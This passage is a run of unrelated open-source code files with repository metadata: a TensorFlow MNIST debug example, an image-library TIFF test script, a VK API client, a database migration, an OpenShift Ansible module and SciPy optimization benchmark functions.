nargs="?",
const=True,
default=False,
help="Use fake MNIST data for unit testing")
parser.add_argument(
"--check_numerics",
type="bool",
nargs="?",
const=True,
default=False,
help="Use tfdbg to track down bad values during training. "
"Mutually exclusive with the --dump_dir flag.")
parser.add_argument(
"--dump_dir",
type=str,
default=None,
help="Dump TensorFlow program debug data to the specified directory. "
"The dumped data contains information regarding tf.function building, "
"execution of ops and tf.functions, as well as their stack traces and "
"associated source-code snapshots. "
"Mutually exclusive with the --check_numerics flag.")
parser.add_argument(
"--dump_tensor_debug_mode",
type=str,
default="NO_TENSOR",
help="Mode for dumping tensor values. Options: NO_TENSOR, CURT_HEALTH, "
"CONCISE_HEALTH, SHAPE, FULL_TENSOR. This is relevant only when "
"--dump_dir is set.")
# TODO(cais): Add more tensor debug mode strings once they are supported.
parser.add_argument(
"--dump_circular_buffer_size",
type=int,
default=1000,
help="Size of the circular buffer used to dump execution events. "
"This is relevant only when --dump_dir is set.")
parser.add_argument(
"--use_random_config_path",
type="bool",
nargs="?",
const=True,
default=False,
help="""If set, set config file path to a random file in the temporary
directory.""")
return parser.parse_known_args()
def main(_):
if FLAGS.check_numerics and FLAGS.dump_dir:
raise ValueError(
"The --check_numerics and --dump_dir flags are mutually "
"exclusive.")
if FLAGS.check_numerics:
tf.debugging.enable_check_numerics()
elif FLAGS.dump_dir:
tf.debugging.experimental.enable_dump_debug_info(
FLAGS.dump_dir,
tensor_debug_mode=FLAGS.dump_tensor_debug_mode,
circular_buffer_size=FLAGS.dump_circular_buffer_size)
# Import data
if FLAGS.fake_data:
imgs = tf.random.uniform(maxval=256, shape=(1000, 28, 28), dtype=tf.int32)
labels = tf.random.uniform(maxval=10, shape=(1000,), dtype=tf.int32)
mnist_train = imgs, labels
mnist_test = imgs, labels
else:
mnist_train, mnist_test = tf.keras.datasets.mnist.load_data()
@tf.function
def format_example(imgs, labels):
"""Formats each training and test example to work with our model."""
imgs = tf.reshape(imgs, [-1, 28 * 28])
imgs = tf.cast(imgs, tf.float32) / 255.0
labels = tf.one_hot(labels, depth=10, dtype=tf.float32)
return imgs, labels
train_ds = tf.data.Dataset.from_tensor_slices(mnist_train).shuffle(
FLAGS.train_batch_size * FLAGS.max_steps,
seed=RAND_SEED).batch(FLAGS.train_batch_size)
train_ds = train_ds.map(format_example)
test_ds = tf.data.Dataset.from_tensor_slices(mnist_test).repeat().batch(
len(mnist_test[0]))
test_ds = test_ds.map(format_example)
def get_dense_weights(input_dim, output_dim):
"""Initializes the parameters for a single dense layer."""
initial_kernel = tf.keras.initializers.TruncatedNormal(
mean=0.0, stddev=0.1, seed=RAND_SEED)
kernel = tf.Variable(initial_kernel([input_dim, output_dim]))
bias = tf.Variable(tf.constant(0.1, shape=[output_dim]))
return kernel, bias
@tf.function
def dense_layer(weights, input_tensor, act=tf.nn.relu):
"""Runs the forward computation for a single dense layer."""
kernel, bias = weights
preactivate = tf.matmul(input_tensor, kernel) + bias
activations = act(preactivate)
return activations
# init model
hidden = get_dense_weights(IMAGE_SIZE**2, HIDDEN_SIZE)
logits = get_dense_weights(HIDDEN_SIZE, NUM_LABELS)
variables = hidden + logits
@tf.function
def model(x):
"""Feed forward function of the model.
Args:
x: a (?, 28*28) tensor consisting of the feature inputs for a batch of
examples.
Returns:
A (?, 10) tensor containing the class scores for each example.
"""
hidden_act = dense_layer(hidden, x)
logits_act = dense_layer(logits, hidden_act, tf.identity)
y = tf.nn.softmax(logits_act)
return y
@tf.function
def loss(logits, labels):
"""Calculates cross entropy loss."""
diff = -(labels * tf.math.log(logits))
loss = tf.reduce_mean(diff)
return loss
train_batches = iter(train_ds)
test_batches = iter(test_ds)
optimizer = tf.optimizers.Adam(learning_rate=FLAGS.learning_rate)
for i in range(FLAGS.max_steps):
x_train, y_train = next(train_batches)
x_test, y_test = next(test_batches)
# Train Step
with tf.GradientTape() as tape:
y = model(x_train)
loss_val = loss(y, y_train)
grads = tape.gradient(loss_val, variables)
optimizer.apply_gradients(zip(grads, variables))
# Evaluation Step
y = model(x_test)
correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_test, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print("Accuracy at step %d: %s" % (i, accuracy.numpy()))
if __name__ == "__main__":
FLAGS, unparsed = parse_args()
absl.app.run(main=main, argv=[sys.argv[0]] + unparsed)
|
apache-2.0
|
sambler/oiio
|
testsuite/tiff-depths/run.py
|
4
|
2847
|
#!/usr/bin/env python
# FIXME -- eventually, we want more (all?) of these to work
imagedir = parent + "/libtiffpic/depth"
files = [
"flower-minisblack-02.tif", # 73x43 2-bit minisblack gray image
"flower-minisblack-04.tif", # 73x43 4-bit minisblack gray image
"flower-minisblack-06.tif", # 73x43 6-bit minisblack gray image
"flower-minisblack-08.tif", # 73x43 8-bit minisblack gray image
"flower-minisblack-10.tif", # 73x43 10-bit minisblack gray image
"flower-minisblack-12.tif", # 73x43 12-bit minisblack gray image
"flower-minisblack-14.tif", # 73x43 14-bit minisblack gray image
"flower-minisblack-16.tif", # 73x43 16-bit minisblack gray image
#FIXME "flower-minisblack-24.tif", # 73x43 24-bit minisblack gray image
#FIXME "flower-minisblack-32.tif", # 73x43 32-bit minisblack gray image
"flower-palette-02.tif", #73x43 4-entry colormapped image
"flower-palette-04.tif", #73x43 16-entry colormapped image
"flower-palette-08.tif", #73x43 256-entry colormapped image
#FIXME "flower-palette-16.tif", # 73x43 65536-entry colormapped image
"flower-rgb-contig-02.tif", # 73x43 2-bit contiguous RGB image
"flower-rgb-contig-04.tif", # 73x43 4-bit contiguous RGB image
"flower-rgb-contig-08.tif", # 73x43 8-bit contiguous RGB image
"flower-rgb-contig-10.tif", # 73x43 10-bit contiguous RGB image
"flower-rgb-contig-12.tif", # 73x43 12-bit contiguous RGB image
"flower-rgb-contig-14.tif", # 73x43 14-bit contiguous RGB image
"flower-rgb-contig-16.tif", # 73x43 16-bit contiguous RGB image
#FIXME "flower-rgb-contig-24.tif", # 73x43 24-bit contiguous RGB image
#FIXME "flower-rgb-contig-32.tif", # 73x43 32-bit contiguous RGB image
"flower-rgb-planar-02.tif", # 73x43 2-bit seperated RGB image
"flower-rgb-planar-04.tif", # 73x43 4-bit seperated RGB image
"flower-rgb-planar-08.tif", # 73x43 8-bit seperated RGB image
"flower-rgb-planar-10.tif", # 73x43 10-bit seperated RGB image
"flower-rgb-planar-12.tif", # 73x43 12-bit seperated RGB image
"flower-rgb-planar-14.tif", # 73x43 14-bit seperated RGB image
"flower-rgb-planar-16.tif" # 73x43 16-bit seperated RGB image
#FIXME "flower-rgb-planar-24.tif", # 73x43 24-bit seperated RGB image
#FIXME "flower-rgb-planar-32.tif", # 73x43 32-bit seperated RGB image
#FIXME "flower-separated-contig-08.tif", # 73x43 8-bit contiguous CMYK image
#FIXME "flower-separated-contig-16.tif", # 73x43 16-bit contiguous CMYK image
#FIXME "flower-separated-planar-08.tif", # 73x43 8-bit separated CMYK image
#FIXME "flower-separated-planar-16.tif", # 73x43 16-bit separated CMYK image
]
for f in files:
command += rw_command (imagedir, f)
print ("COMMAND= " + command)
|
bsd-3-clause
|
cydev/cyvk
|
api/vkapi.py
|
1
|
5829
|
from __future__ import unicode_literals
import time
from compat import text_type, get_logger, requests, json
from config import MAX_API_RETRY, API_MAXIMUM_RATE, TRANSPORT_ID
from .errors import (api_errors, UnknownError, IncorrectApiResponse, TooManyRequestsPerSecond, AuthenticationException,
InvalidTokenError)
from .messages import MessagesApi
from .api import method_wrapper
from .parsing import escape_name
from .polling import LongPolling
from cystanza.stanza import ChatMessage
VK_ERROR_BURST = 6
WAIT_RATE = 2.
_logger = get_logger()
class Api(object):
URL = 'https://api.vk.com/method/%s'
VERSION = '3.0'
def __init__(self, user, ):
self.user = user
self.jid = user.jid
self.messages = MessagesApi(self)
self.last_method_time = 0
self.polling = LongPolling(self)
@property
def token(self):
return self.user.token
def _method(self, method_name, args=None, additional_timeout=0, retry=0):
"""
Makes post-request to vk api witch burst protection and exception handling
@type method_name: text_type
@param method_name: vk api method name
@param args: method parameters
@param additional_timeout: time in seconds to wait before reattempting
"""
assert isinstance(method_name, text_type)
if retry > MAX_API_RETRY:
raise IncorrectApiResponse('reached max api retry for %s, %s' % (method_name, self.jid))
args = args or {}
args.update({'v': self.VERSION, 'access_token': self.token})
_logger.debug('calling api method %s, arguments: %s' % (method_name, args))
time.sleep(additional_timeout)
now = time.time()
diff = now - self.last_method_time
if diff < API_MAXIMUM_RATE:
_logger.debug('burst protected')
time.sleep(abs(diff - API_MAXIMUM_RATE))
self.last_method_time = now
try:
response = requests.post(self.URL % method_name, args)
if response.status_code != 200:
raise requests.HTTPError('incorrect response status code')
body = json.loads(response.text)
_logger.debug('got: %s' % body)
if 'response' in body:
return body['response']
if 'error' in body and 'error_code' in body['error']:
code = body['error']['error_code']
raise api_errors.get(code, UnknownError())
raise NotImplementedError('unable to process %s' % body)
except (requests.RequestException, ValueError) as e:
_logger.error('method error: %s' % e)
additional_timeout = additional_timeout or 1
except TooManyRequestsPerSecond:
additional_timeout = additional_timeout or API_MAXIMUM_RATE / WAIT_RATE
additional_timeout *= WAIT_RATE
return self._method(method_name, args, additional_timeout, retry + 1)
@method_wrapper
def method(self, method_name, args=None, raise_auth=False):
"""Call method with error handling"""
try:
return self._method(method_name, args)
# except CaptchaNeeded:
# _logger.error('captcha challenge for %s' % self.jid)
# raise NotImplementedError('captcha')
except AuthenticationException as e:
self.user.transport.send(ChatMessage(TRANSPORT_ID, self.jid, 'Authentication error: %s' % e))
# except NotAllowed:
# friend_jid = get_friend_jid(args.get('user_id', TRANSPORT_ID))
# text = "You're not allowed to perform this action"
# push(ChatMessage(friend_jid, self.jid, text))
# except AccessRevokedError:
# _logger.debug('user %s revoked access' % self.jid)
# push(ChatMessage(TRANSPORT_ID, self.jid, "You've revoked access and will be unregistered from transport"))
# database.remove_user(self.jid)
# realtime.remove_online_user(self.jid)
except InvalidTokenError:
self.user.transport.send((ChatMessage(TRANSPORT_ID, self.jid, 'Your token is invalid. Register again')))
except NotImplementedError as e:
self.user.transport.send((ChatMessage(TRANSPORT_ID, self.jid, 'Feature not implemented: %s' % e)))
if raise_auth:
raise AuthenticationException()
@method_wrapper
def get(self, uid, fields=None):
fields = fields or ['screen_name']
args = dict(fields=','.join(fields), user_ids=uid)
data = self.method('users.get', args)[0]
data['name'] = escape_name('', u'%s %s' % (data['first_name'], data['last_name']))
del data['first_name'], data['last_name']
return data
@method_wrapper
def set_online(self):
self.method("account.setOnline")
@method_wrapper
def get_friends(self, fields=None, online=None):
fields = fields or ["screen_name"]
method_name = "friends.get"
if online:
method_name = "friends.getOnline"
friends_raw = self.method(method_name, {"fields": ",".join(fields)}) or {}
friends = {}
for friend in friends_raw:
uid = friend["uid"]
name = escape_name("", u"%s %s" % (friend["first_name"], friend["last_name"]))
friends[uid] = {"name": name, "online": friend["online"]}
for key in fields:
if key != "screen_name":
friends[uid][key] = friend.get(key)
return friends
@method_wrapper
def is_application_user(self):
"""Check if client is application user and validate token"""
try:
self.method('isAppUser', raise_auth=True)
return True
except AuthenticationException:
return False
|
mit
|
NetApp/cinder
|
cinder/db/sqlalchemy/migrate_repo/versions/062_deleted_type_to_Integer.py
|
11
|
1215
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import Integer
from sqlalchemy import MetaData, Table
def upgrade(migrate_engine):
"""Deleted col of volume_type_projects converted(tinyint->Int)."""
meta = MetaData()
meta.bind = migrate_engine
volume_type_projects = Table('volume_type_projects', meta, autoload=True)
if migrate_engine.name == 'postgresql':
# NOTE: PostgreSQL can't cast Boolean to int automatically
sql = 'ALTER TABLE volume_type_projects ALTER COLUMN deleted ' + \
'TYPE INTEGER USING deleted::integer'
migrate_engine.execute(sql)
else:
volume_type_projects.c.deleted.alter(Integer)
|
apache-2.0
|
ivanhorvath/openshift-tools
|
ansible/roles/lib_oa_openshift/src/ansible/oc_label.py
|
84
|
1037
|
# pylint: skip-file
# flake8: noqa
def main():
''' ansible oc module for labels '''
module = AnsibleModule(
argument_spec=dict(
kubeconfig=dict(default='/etc/origin/master/admin.kubeconfig', type='str'),
state=dict(default='present', type='str',
choices=['present', 'absent', 'list', 'add']),
debug=dict(default=False, type='bool'),
kind=dict(default='node', type='str',
choices=['node', 'pod', 'namespace']),
name=dict(default=None, type='str'),
namespace=dict(default=None, type='str'),
labels=dict(default=None, type='list'),
selector=dict(default=None, type='str'),
),
supports_check_mode=True,
mutually_exclusive=(['name', 'selector']),
)
results = OCLabel.run_ansible(module.params, module.check_mode)
if 'failed' in results:
module.fail_json(**results)
module.exit_json(**results)
if __name__ == '__main__':
main()
|
apache-2.0
|
argriffing/scipy
|
benchmarks/benchmarks/go_benchmark_functions/go_funcs_C.py
|
10
|
18425
|
# -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import numpy as np
from numpy import (abs, asarray, cos, exp, floor, pi, sign, sin, sqrt, sum,
size, tril, isnan, atleast_2d, repeat)
from numpy.testing import assert_almost_equal
from .go_benchmark import Benchmark
class CarromTable(Benchmark):
"""
CarromTable objective function.
The CarromTable [1]_ global optimization problem is a multimodal
minimization problem defined as follows:
.. math::
f_{\text{CarromTable}}(x) = - \frac{1}{30}\left(\cos(x_1)
cos(x_2) e^{\left|1 - \frac{\sqrt{x_1^2 + x_2^2}}{\pi}\right|}\right)^2
with :math:`x_i \in [-10, 10]` for :math:`i = 1, 2`.
*Global optimum*: :math:`f(x) = -24.15681551650653` for :math:`x_i = \pm
9.646157266348881` for :math:`i = 1, 2`
.. [1] Jamil, M. & Yang, X.-S. A Literature Survey of Benchmark Functions
For Global Optimization Problems Int. Journal of Mathematical Modelling
and Numerical Optimisation, 2013, 4, 150-194.
"""
def __init__(self, dimensions=2):
Benchmark.__init__(self, dimensions)
self._bounds = zip([-10.0] * self.N, [10.0] * self.N)
self.global_optimum = [(9.646157266348881, 9.646134286497169),
(-9.646157266348881, 9.646134286497169),
(9.646157266348881, -9.646134286497169),
(-9.646157266348881, -9.646134286497169)]
self.fglob = -24.15681551650653
def fun(self, x, *args):
self.nfev += 1
u = cos(x[0]) * cos(x[1])
v = sqrt(x[0] ** 2 + x[1] ** 2)
return -((u * exp(abs(1 - v / pi))) ** 2) / 30.
class Chichinadze(Benchmark):
"""
Chichinadze objective function.
This class defines the Chichinadze [1]_ global optimization problem. This is a
multimodal minimization problem defined as follows:
.. math::
f_{\text{Chichinadze}}(x) = x_{1}^{2} - 12 x_{1}
+ 8 \sin\left(\frac{5}{2} \pi x_{1}\right)
+ 10 \cos\left(\frac{1}{2} \pi x_{1}\right) + 11
- 0.2 \frac{\sqrt{5}}{e^{\frac{1}{2} \left(x_{2} -0.5 \right)^{2}}}
with :math:`x_i \in [-30, 30]` for :math:`i = 1, 2`.
*Global optimum*: :math:`f(x) = -42.94438701899098` for :math:`x =
[6.189866586965680, 0.5]`
.. [1] Gavana, A. Global Optimization Benchmarks and AMPGO retrieved 2015
TODO: Jamil#33 has a dividing factor of 2 in the sin term. However, f(x)
for the given solution does not give the global minimum. i.e. the equation
is at odds with the solution.
Only by removing the dividing factor of 2, i.e. `8 * sin(5 * pi * x[0])`
does the given solution result in the given global minimum.
Do we keep the result or equation?
"""
def __init__(self, dimensions=2):
Benchmark.__init__(self, dimensions)
self._bounds = zip([-30.0] * self.N, [30.0] * self.N)
self.custom_bounds = [(-10, 10), (-10, 10)]
self.global_optimum = [[6.189866586965680, 0.5]]
self.fglob = -42.94438701899098
def fun(self, x, *args):
self.nfev += 1
return (x[0] ** 2 - 12 * x[0] + 11 + 10 * cos(pi * x[0] / 2)
+ 8 * sin(5 * pi * x[0] / 2)
- 1.0 / sqrt(5) * exp(-((x[1] - 0.5) ** 2) / 2))
class Cigar(Benchmark):
"""
Cigar objective function.
This class defines the Cigar [1]_ global optimization problem. This
is a multimodal minimization problem defined as follows:
.. math::
f_{\text{Cigar}}(x) = x_1^2 + 10^6\sum_{i=2}^{n} x_i^2
Here, :math:`n` represents the number of dimensions and :math:`x_i \in
[-100, 100]` for :math:`i = 1, ..., n`.
*Global optimum*: :math:`f(x) = 0` for :math:`x_i = 0` for
:math:`i = 1, ..., n`
.. [1] Gavana, A. Global Optimization Benchmarks and AMPGO retrieved 2015
"""
def __init__(self, dimensions=2):
Benchmark.__init__(self, dimensions)
self._bounds = zip([-100.0] * self.N,
[100.0] * self.N)
self.custom_bounds = [(-5, 5), (-5, 5)]
self.global_optimum = [[0 for _ in range(self.N)]]
self.fglob = 0.0
self.change_dimensionality = True
def fun(self, x, *args):
self.nfev += 1
return x[0] ** 2 + 1e6 * sum(x[1:] ** 2)
class Cola(Benchmark):
"""
Cola objective function.
This class defines the Cola global optimization problem. The 17-dimensional
function computes indirectly the formula :math:`f(n, u)` by setting
:math:`x_0 = y_0, x_1 = u_0, x_i = u_{2(i2)}, y_i = u_{2(i2)+1}` :
.. math::
f_{\text{Cola}}(x) = \sum_{i<j}^{n} \left (r_{i,j} - d_{i,j} \right )^2
Where :math:`r_{i, j}` is given by:
.. math::
r_{i, j} = \sqrt{(x_i - x_j)^2 + (y_i - y_j)^2}
And :math:`d` is a symmetric matrix given by:
.. math::
\{d} = \left [ d_{ij} \right ] = \begin{pmatrix}
1.27 & & & & & & & & \\
1.69 & 1.43 & & & & & & & \\
2.04 & 2.35 & 2.43 & & & & & & \\
3.09 & 3.18 & 3.26 & 2.85 & & & & & \\
3.20 & 3.22 & 3.27 & 2.88 & 1.55 & & & & \\
2.86 & 2.56 & 2.58 & 2.59 & 3.12 & 3.06 & & & \\
3.17 & 3.18 & 3.18 & 3.12 & 1.31 & 1.64 & 3.00 & \\
3.21 & 3.18 & 3.18 & 3.17 & 1.70 & 1.36 & 2.95 & 1.32 & \\
2.38 & 2.31 & 2.42 & 1.94 & 2.85 & 2.81 & 2.56 & 2.91 & 2.97
\end{pmatrix}
This function has bounds :math:`x_0 \in [0, 4]` and :math:`x_i \in [-4, 4]`
for :math:`i = 1, ..., n-1`.
*Global optimum* 11.7464.
.. [1] Jamil, M. & Yang, X.-S. A Literature Survey of Benchmark Functions
For Global Optimization Problems Int. Journal of Mathematical Modelling
and Numerical Optimisation, 2013, 4, 150-194.
"""
def __init__(self, dimensions=17):
Benchmark.__init__(self, dimensions)
self._bounds = [[0.0, 4.0]] + list(zip([-4.0] * (self.N - 1),
[4.0] * (self.N - 1)))
self.global_optimum = [[0.651906, 1.30194, 0.099242, -0.883791,
-0.8796, 0.204651, -3.28414, 0.851188,
-3.46245, 2.53245, -0.895246, 1.40992,
-3.07367, 1.96257, -2.97872, -0.807849,
-1.68978]]
self.fglob = 11.7464
self.d = asarray([[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1.27, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1.69, 1.43, 0, 0, 0, 0, 0, 0, 0, 0],
[2.04, 2.35, 2.43, 0, 0, 0, 0, 0, 0, 0],
[3.09, 3.18, 3.26, 2.85, 0, 0, 0, 0, 0, 0],
[3.20, 3.22, 3.27, 2.88, 1.55, 0, 0, 0, 0, 0],
[2.86, 2.56, 2.58, 2.59, 3.12, 3.06, 0, 0, 0, 0],
[3.17, 3.18, 3.18, 3.12, 1.31, 1.64, 3.00, 0, 0, 0],
[3.21, 3.18, 3.18, 3.17, 1.70, 1.36, 2.95, 1.32, 0, 0],
[2.38, 2.31, 2.42, 1.94, 2.85, 2.81, 2.56, 2.91, 2.97, 0.]])
def fun(self, x, *args):
self.nfev += 1
xi = atleast_2d(asarray([0.0, x[0]] + list(x[1::2])))
xj = repeat(xi, size(xi, 1), axis=0)
xi = xi.T
yi = atleast_2d(asarray([0.0, 0.0] + list(x[2::2])))
yj = repeat(yi, size(yi, 1), axis=0)
yi = yi.T
inner = (sqrt(((xi - xj) ** 2 + (yi - yj) ** 2)) - self.d) ** 2
inner = tril(inner, -1)
return sum(sum(inner, axis=1))
class Colville(Benchmark):
"""
Colville objective function.
This class defines the Colville global optimization problem. This
is a multimodal minimization problem defined as follows:
.. math::
f_{\text{Colville}}(x) = \left(x_{1} -1\right)^{2}
+ 100 \left(x_{1}^{2} - x_{2}\right)^{2}
+ 10.1 \left(x_{2} -1\right)^{2} + \left(x_{3} -1\right)^{2}
+ 90 \left(x_{3}^{2} - x_{4}\right)^{2}
+ 10.1 \left(x_{4} -1\right)^{2} + 19.8 \frac{x_{4} -1}{x_{2}}
with :math:`x_i \in [-10, 10]` for :math:`i = 1, ..., 4`.
*Global optimum*: :math:`f(x) = 0` for :math:`x_i = 1` for
:math:`i = 1, ..., 4`
.. [1] Jamil, M. & Yang, X.-S. A Literature Survey of Benchmark Functions
For Global Optimization Problems Int. Journal of Mathematical Modelling
and Numerical Optimisation, 2013, 4, 150-194.
TODO docstring equation is wrong use Jamil#36
"""
def __init__(self, dimensions=4):
Benchmark.__init__(self, dimensions)
self._bounds = zip([-10.0] * self.N, [10.0] * self.N)
self.global_optimum = [[1 for _ in range(self.N)]]
self.fglob = 0.0
def fun(self, x, *args):
self.nfev += 1
return (100 * (x[0] - x[1] ** 2) ** 2
+ (1 - x[0]) ** 2 + (1 - x[2]) ** 2
+ 90 * (x[3] - x[2] ** 2) ** 2
+ 10.1 * ((x[1] - 1) ** 2 + (x[3] - 1) ** 2)
+ 19.8 * (x[1] - 1) * (x[3] - 1))
class Corana(Benchmark):
"""
Corana objective function.
This class defines the Corana [1]_ global optimization problem. This
is a multimodal minimization problem defined as follows:
.. math::
f_{\text{Corana}}(x) = \begin{cases} \sum_{i=1}^n 0.15 d_i
[z_i - 0.05\textrm{sgn}(z_i)]^2 & \textrm{if }|x_i-z_i| < 0.05 \\
d_ix_i^2 & \textrm{otherwise}\end{cases}
Where, in this exercise:
.. math::
z_i = 0.2 \lfloor |x_i/s_i|+0.49999\rfloor\textrm{sgn}(x_i),
d_i=(1,1000,10,100, ...)
with :math:`x_i \in [-5, 5]` for :math:`i = 1, ..., 4`.
*Global optimum*: :math:`f(x) = 0` for :math:`x_i = 0` for
:math:`i = 1, ..., 4`
..[1] Gavana, A. Global Optimization Benchmarks and AMPGO retrieved 2015
"""
def __init__(self, dimensions=4):
Benchmark.__init__(self, dimensions)
self._bounds = zip([-5.0] * self.N, [5.0] * self.N)
self.global_optimum = [[0 for _ in range(self.N)]]
self.fglob = 0.0
def fun(self, x, *args):
self.nfev += 1
d = [1., 1000., 10., 100.]
r = 0
for j in range(4):
zj = floor(abs(x[j] / 0.2) + 0.49999) * sign(x[j]) * 0.2
if abs(x[j] - zj) < 0.05:
r += 0.15 * ((zj - 0.05 * sign(zj)) ** 2) * d[j]
else:
r += d[j] * x[j] * x[j]
return r
class CosineMixture(Benchmark):
"""
Cosine Mixture objective function.
This class defines the Cosine Mixture global optimization problem. This
is a multimodal minimization problem defined as follows:
.. math::
f_{\text{CosineMixture}}(x) = -0.1 \sum_{i=1}^n \cos(5 \pi x_i)
- \sum_{i=1}^n x_i^2
Here, :math:`n` represents the number of dimensions and :math:`x_i \in
[-1, 1]` for :math:`i = 1, ..., N`.
*Global optimum*: :math:`f(x) = -0.1N` for :math:`x_i = 0` for
:math:`i = 1, ..., N`
.. [1] Jamil, M. & Yang, X.-S. A Literature Survey of Benchmark Functions
For Global Optimization Problems Int. Journal of Mathematical Modelling
and Numerical Optimisation, 2013, 4, 150-194.
TODO, Jamil #38 has wrong minimum and wrong fglob. I plotted it.
-(x**2) term is always negative if x is negative.
cos(5 * pi * x) is equal to -1 for x=-1.
"""
def __init__(self, dimensions=2):
Benchmark.__init__(self, dimensions)
self.change_dimensionality = True
self._bounds = zip([-1.0] * self.N, [1.0] * self.N)
self.global_optimum = [[-1. for _ in range(self.N)]]
self.fglob = -0.9 * self.N
def fun(self, x, *args):
self.nfev += 1
return -0.1 * sum(cos(5.0 * pi * x)) - sum(x ** 2.0)
class CrossInTray(Benchmark):
"""
Cross-in-Tray objective function.
This class defines the Cross-in-Tray [1]_ global optimization problem. This is a
multimodal minimization problem defined as follows:
.. math::
f_{\text{CrossInTray}}(x) = - 0.0001 \left(\left|{e^{\left|{100
- \frac{\sqrt{x_{1}^{2} + x_{2}^{2}}}{\pi}}\right|}
\sin\left(x_{1}\right) \sin\left(x_{2}\right)}\right| + 1\right)^{0.1}
with :math:`x_i \in [-15, 15]` for :math:`i = 1, 2`.
*Global optimum*: :math:`f(x) = -2.062611870822739` for :math:`x_i =
\pm 1.349406608602084` for :math:`i = 1, 2`
.. [1] Jamil, M. & Yang, X.-S. A Literature Survey of Benchmark Functions
For Global Optimization Problems Int. Journal of Mathematical Modelling
and Numerical Optimisation, 2013, 4, 150-194.
"""
def __init__(self, dimensions=2):
Benchmark.__init__(self, dimensions)
self._bounds = zip([-10.0] * self.N, [10.0] * self.N)
self.global_optimum = [(1.349406685353340, 1.349406608602084),
(-1.349406685353340, 1.349406608602084),
(1.349406685353340, -1.349406608602084),
(-1.349406685353340, -1.349406608602084)]
self.fglob = -2.062611870822739
def fun(self, x, *args):
self.nfev += 1
return (-0.0001 * (abs(sin(x[0]) * sin(x[1])
* exp(abs(100 - sqrt(x[0] ** 2 + x[1] ** 2) / pi)))
+ 1) ** (0.1))
class CrossLegTable(Benchmark):
"""
Cross-Leg-Table objective function.
This class defines the Cross-Leg-Table [1]_ global optimization problem. This
is a multimodal minimization problem defined as follows:
.. math::
f_{\text{CrossLegTable}}(x) = - \frac{1}{\left(\left|{e^{\left|{100
- \frac{\sqrt{x_{1}^{2} + x_{2}^{2}}}{\pi}}\right|}
\sin\left(x_{1}\right) \sin\left(x_{2}\right)}\right| + 1\right)^{0.1}}
with :math:`x_i \in [-10, 10]` for :math:`i = 1, 2`.
*Global optimum*: :math:`f(x) = -1`. The global minimum is found on the
planes :math:`x_1 = 0` and :math:`x_2 = 0`
..[1] Mishra, S. Global Optimization by Differential Evolution and Particle
Swarm Methods: Evaluation on Some Benchmark Functions Munich University,
2006
"""
def __init__(self, dimensions=2):
Benchmark.__init__(self, dimensions)
self._bounds = zip([-10.0] * self.N, [10.0] * self.N)
self.global_optimum = [[0., 0.]]
self.fglob = -1.0
def fun(self, x, *args):
self.nfev += 1
u = 100 - sqrt(x[0] ** 2 + x[1] ** 2) / pi
v = sin(x[0]) * sin(x[1])
return -(abs(v * exp(abs(u))) + 1) ** (-0.1)
class CrownedCross(Benchmark):
"""
Crowned Cross objective function.
This class defines the Crowned Cross [1]_ global optimization problem. This
is a multimodal minimization problem defined as follows:
.. math::
f_{\text{CrownedCross}}(x) = 0.0001 \left(\left|{e^{\left|{100
- \frac{\sqrt{x_{1}^{2} + x_{2}^{2}}}{\pi}}\right|}
\sin\left(x_{1}\right) \sin\left(x_{2}\right)}\right| + 1\right)^{0.1}
with :math:`x_i \in [-10, 10]` for :math:`i = 1, 2`.
*Global optimum*: :math:`f(x_i) = 0.0001`. The global minimum is found on
the planes :math:`x_1 = 0` and :math:`x_2 = 0`
..[1] Mishra, S. Global Optimization by Differential Evolution and Particle
Swarm Methods: Evaluation on Some Benchmark Functions Munich University,
2006
"""
def __init__(self, dimensions=2):
Benchmark.__init__(self, dimensions)
self._bounds = zip([-10.0] * self.N, [10.0] * self.N)
self.global_optimum = [[0, 0]]
self.fglob = 0.0001
def fun(self, x, *args):
self.nfev += 1
u = 100 - sqrt(x[0] ** 2 + x[1] ** 2) / pi
v = sin(x[0]) * sin(x[1])
return 0.0001 * (abs(v * exp(abs(u))) + 1) ** (0.1)
class Csendes(Benchmark):
"""
Csendes objective function.
This class defines the Csendes [1]_ global optimization problem. This is a
multimodal minimization problem defined as follows:
.. math::
f_{\text{Csendes}}(x) = \sum_{i=1}^n x_i^6 \left[ 2 + \sin
\left( \frac{1}{x_i} \right ) \right]
Here, :math:`n` represents the number of dimensions and :math:`x_i \in
[-1, 1]` for :math:`i = 1, ..., N`.
*Global optimum*: :math:`f(x) = 0.0` for :math:`x_i = 0` for
:math:`i = 1, ..., N`
.. [1] Jamil, M. & Yang, X.-S. A Literature Survey of Benchmark Functions
For Global Optimization Problems Int. Journal of Mathematical Modelling
and Numerical Optimisation, 2013, 4, 150-194.
"""
def __init__(self, dimensions=2):
Benchmark.__init__(self, dimensions)
self.change_dimensionality = True
self._bounds = zip([-1.0] * self.N, [1.0] * self.N)
self.global_optimum = [[0 for _ in range(self.N)]]
self.fglob = np.nan
def fun(self, x, *args):
self.nfev += 1
try:
return sum((x ** 6.0) * (2.0 + sin(1.0 / x)))
except ZeroDivisionError:
return np.nan
except FloatingPointError:
return np.nan
def success(self, x):
"""Is a candidate solution at the global minimum"""
val = self.fun(asarray(x))
if isnan(val):
return True
try:
assert_almost_equal(val, 0., 4)
return True
except AssertionError:
return False
return False
class Cube(Benchmark):
"""
Cube objective function.
This class defines the Cube global optimization problem. This
is a multimodal minimization problem defined as follows:
.. math::
f_{\text{Cube}}(x) = 100(x_2 - x_1^3)^2 + (1 - x1)^2
Here, :math:`n` represents the number of dimensions and :math:`x_i \in [-10, 10]` for :math:`i=1,...,N`.
*Global optimum*: :math:`f(x_i) = 0.0` for :math:`x = [1, 1]`
.. [1] Jamil, M. & Yang, X.-S. A Literature Survey of Benchmark Functions
For Global Optimization Problems Int. Journal of Mathematical Modelling
and Numerical Optimisation, 2013, 4, 150-194.
TODO: jamil#41 has the wrong solution.
"""
def __init__(self, dimensions=2):
Benchmark.__init__(self, dimensions)
